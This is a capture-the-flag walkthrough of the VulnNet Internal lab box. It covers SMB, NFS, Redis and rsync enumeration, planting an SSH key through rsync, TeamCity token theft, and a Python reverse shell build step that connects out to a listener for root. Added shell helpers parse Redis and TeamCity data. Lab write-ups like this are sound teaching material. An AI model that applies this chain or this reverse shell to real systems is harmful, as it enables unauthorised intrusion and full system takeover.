VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.
Difficulty: Easy/Medium
Operating System: Linux
This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags.
As always, we start with an nmap scan (default scripts, version detection, all three output formats saved under the name nmap):
nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Mon May 10 03:22:51 2021 as: nmap -sC -sV -oA nmap 10.10.174.95
Nmap scan report for 10.10.174.95
Host is up (0.59s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 33966/udp6 mountd
| 100005 1,2,3 48735/tcp6 mountd
| 100005 1,2,3 57104/udp mountd
| 100005 1,2,3 60145/tcp mountd
| 100021 1,3,4 34733/tcp nlockmgr
| 100021 1,3,4 37755/tcp6 nlockmgr
| 100021 1,3,4 41102/udp6 nlockmgr
| 100021 1,3,4 46449/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
8021/tcp filtered ftp-proxy
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h20m08s, deviation: 1h09m15s, median: 3h00m07s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2021-05-10T12:39:18+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-10T10:39:17
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 10 03:39:32 2021 -- 1 IP address (1 host up) scanned in 1000.27 seconds
Six ports are open (22, 111, 139, 445, 873 and 2049) and two more (8021, 9090) are filtered. SMB is a good place to start: list the shares and check whether any of them allow anonymous (null-session) access.
smbclient -L //10.10.174.95/ -N
One share, shares, is listed, and it can be opened with a null session:
smbclient //10.10.174.95/shares -N
And we are in.
In the temp folder we find the first flag, services.txt.
The data folder holds a couple of text files, but they are only chat messages and nothing useful.
Back to the scan: port 2049 is NFS (Network File System), a client/server protocol that lets a client access files on a remote server as if they sat in a local directory. showmount -e asks the server which directories it exports and to which hosts; an export listed with * can be mounted by any client.
Mounting it:
- showmount -e 10.10.174.95
- mkdir /tmp/NFS
- mount -t nfs 10.10.174.95:/opt/conf /tmp/NFS
- df -k
The export is now available under /tmp/NFS (df -k only confirms the mount).
Redis is also running on the target on port 6379 (it is not in the scan above, so that port is worth a rescan), and the export contains Redis configuration. The thing to look for in a redis.conf is the requirepass directive, which is where a Redis password is set.
It is there, so we have the password and can enumerate Redis on port 6379: connect with redis-cli using that password and run info.
The Keyspace section at the end of the info output shows which databases hold keys. Time to dump them:
redis-dump -u 10.10.174.95 -a Password > db_full.json
The dump contains the internal flag
plus a list of base64 strings. Decoding them with base64 -d
gives plain text that includes a new password.
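As an added example (not part of the original writeup), the shell snippet below scripts the two steps just described: it pulls the requirepass directive out of a redis.conf copied from the NFS export, and decodes every base64-looking value in a redis-dump output file. The redis.conf fragment and the dump lines are constructed stand-ins for the real files on the box, and the password and decoded strings are made up.

```sh
#!/bin/sh
# Added example (not from the original writeup). Both inputs below are
# constructed samples imitating a redis.conf and redis-dump's output.

# Constructed redis.conf fragment: a commented-out default and the live one.
REDIS_CONF='# redis.conf
bind 127.0.0.1
port 6379
# requirepass foobared
requirepass S3cr3t-Example-Pass
maxmemory 256mb'

# Constructed redis-dump output, one JSON object per line as the tool writes it.
REDIS_DUMP='{"db":0,"key":"internal flag","ttl":-1,"type":"string","value":"flag-value-redacted","size":19}
{"db":0,"key":"int","ttl":-1,"type":"list","value":["dGhpcyBpcyBhIGNvbnN0cnVjdGVkIHNhbXBsZQ==","bm90IGEgcmVhbCBjcmVkZW50aWFs"],"size":2}'

# Active (non-comment) requirepass directive; Redis applies the last one it reads.
redis_password() {
    printf '%s\n' "$REDIS_CONF" | awk '$1 == "requirepass" { pw = $2 } END { print pw }'
}

# Every quoted value that looks like base64 (16+ base64 chars, optional padding),
# decoded one per line. Values that do not decode cleanly are skipped.
decode_b64_values() {
    printf '%s\n' "$REDIS_DUMP" \
      | grep -oE '"[A-Za-z0-9+/]{16,}={0,2}"' \
      | tr -d '"' \
      | while IFS= read -r tok; do
            dec=$(printf '%s' "$tok" | base64 -d 2>/dev/null) && printf '%s\n' "$dec"
        done
}
```

redis_password prints the value to hand to redis-cli -a, and decode_b64_values prints each decoded string on its own line. Against the real box you would replace REDIS_CONF with the file from the NFS mount and REDIS_DUMP with db_full.json.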
rsync. What is rsync? rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers, by comparing the modification times and sizes of files. It is commonly found on Unix-like operating systems and is written in C as a single-threaded application (thanks, Wikipedia).
rsync usage:
The rsync daemon listens on port 873 and is addressed with rsync:// URLs. Asking for the root of the daemon, with no module name, lists the modules it exports:
rsync -a rsync://rsync-connect@10.10.174.95/
The files module exposes a home directory. Let's pull it onto our machine:
rsync -a rsync://rsync-connect@10.10.174.95/files ./rsync
This takes a while.
Once it finishes, change into ./rsync.
user.txt is there,
and so is a .ssh folder, but the folder is empty.
Since rsync lets us pull files out,
it can probably push files in as well, and an empty .ssh directory is the obvious place for an authorized_keys file. Generate a key pair with `ssh-keygen -t rsa`.
Copy id_rsa.pub to a file named authorized_keys and push it into the target's .ssh directory:
rsync -av authorized_keys rsync://rsync-connect@10.10.174.95:/files/sys-internal/.ssh
The upload goes through, so we can SSH in with the matching private key.
- Restrict the private key's permissions first, or ssh will refuse to use it:
chmod 600 id_rsa
- The username is the name of the home directory we pulled:
sys-internal
- Connect:
ssh -i id_rsa sys-internal@10.10.174.95
We have a shell as sys-internal, but the job is not finished.
Privilege Escalation
The first thing to check after landing on a box is what is listening locally. netstat is not installed on the target, so ss does the job:
ss -tulpn | grep LISTEN
.
Port 8111 stands out: it was not in the scan, so forward it over SSH (local port forwarding) to have a look from our machine:
ssh -i id_rsa -L 8111:localhost:8111 sys-internal@10.10.174.95
Browsing to http://localhost:8111
confirms it: a TeamCity server.
Getting into the super user panel needs an authentication token. TeamCity writes that token to its server log when it starts, so enumerating the TeamCity folder on the box turns it up after some digging.
The token is in /TeamCity/logs/catalina.out.
Log in with an empty username and the token as the password.
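The three steps above (spot the local listener, forward it, dig the token out of the log) can be scripted. The snippet below is an added example written for this page, not code from the original writeup or from TeamCity: it filters a captured ss -tulpn listing down to loopback-only TCP ports, builds the matching -L forwards, and pulls the most recent super user token out of a catalina.out excerpt. The ss listing, the log lines and the token digits are constructed samples; only the log line wording follows what TeamCity prints at startup.

```sh
#!/bin/sh
# Added example (not from the original writeup). Inputs are constructed
# samples that imitate `ss -tulpn` output and TeamCity's catalina.out.

SS_OUTPUT='Netid State  Recv-Q Send-Q    Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0               0.0.0.0:111        0.0.0.0:*
tcp   LISTEN 0      128             0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      128       127.0.0.53%lo:53         0.0.0.0:*
tcp   LISTEN 0      128             0.0.0.0:873        0.0.0.0:*
tcp   LISTEN 0      100           127.0.0.1:8111       0.0.0.0:*
tcp   LISTEN 0      128                [::]:22            [::]:*
tcp   LISTEN 0      100               [::1]:8111          [::]:*'

# TCP ports bound only to a loopback address: nmap never sees them from
# outside, and they are only reachable through a tunnel from the box itself.
loopback_listeners() {
    printf '%s\n' "$SS_OUTPUT" \
      | awk '$1 == "tcp" && $2 == "LISTEN" && ($5 ~ /^127\./ || $5 ~ /^\[::1\]/) {
                 sub(/.*:/, "", $5); print $5
             }' \
      | sort -un
}

# One -L option per loopback port, same number on our side. Ports below 1024
# (here systemd-resolved on 53) would need root locally, so they are skipped.
tunnel_args() {
    loopback_listeners \
      | awk '$1 >= 1024 { args = args (args == "" ? "" : " ") "-L " $1 ":localhost:" $1 }
             END { print args }'
}

# Constructed catalina.out excerpt (token digits are made up). TeamCity issues a
# fresh token on every restart, so only the last occurrence in the log is valid.
CATALINA_OUT='[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server).
[TeamCity] Server shutdown has been requested
[TeamCity] Super user authentication token: 2222222222222222222 (use empty username with the token as the password to access the server).'

teamcity_token() {
    printf '%s\n' "$CATALINA_OUT" \
      | grep -oE 'Super user authentication token: [0-9]+' \
      | tail -n 1 \
      | awk '{ print $NF }'
}
```

loopback_listeners gives the ports that need forwarding, tunnel_args turns them into the -L options for the ssh command above, and teamcity_token prints the value to paste into the TeamCity login form with an empty username. Against the real box, replace the two constants with the live output of ss -tulpn and the contents of /TeamCity/logs/catalina.out.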
We are in, and it is time for a reverse shell. TeamCity executes build steps on its build agent, which on this box runs as root, so a build step that connects back to us hands over a root shell. Click Create new project.
Fill in the form with anything and click Create.
Go to the homepage and open the project we just created.
Click it to create a new build configuration.
Click Create; a new page like the one below should appear.
Go back to the homepage and open the project again.
Click Edit Configuration Settings.
Click Build Steps.
Click Add build step.
Scroll through the runner types and pick Python.
For Command choose Custom script, and paste the Python reverse shell below into the script box:
```python
# Python reverse shell used as the TeamCity build step
# (replace the IP address and port with your listener's).
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 1234))
# Point stdin/stdout/stderr at the socket, then hand them to an interactive sh.
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
```
Replace 10.0.0.1 and 1234 with your own IP address and port, and start an ncat listener on that port before running the build.
Click Save.
Click Run, and the listener should catch the shell.
And there it is: a shell comes back, running as root.
Box rooted.
Greetings from Muzec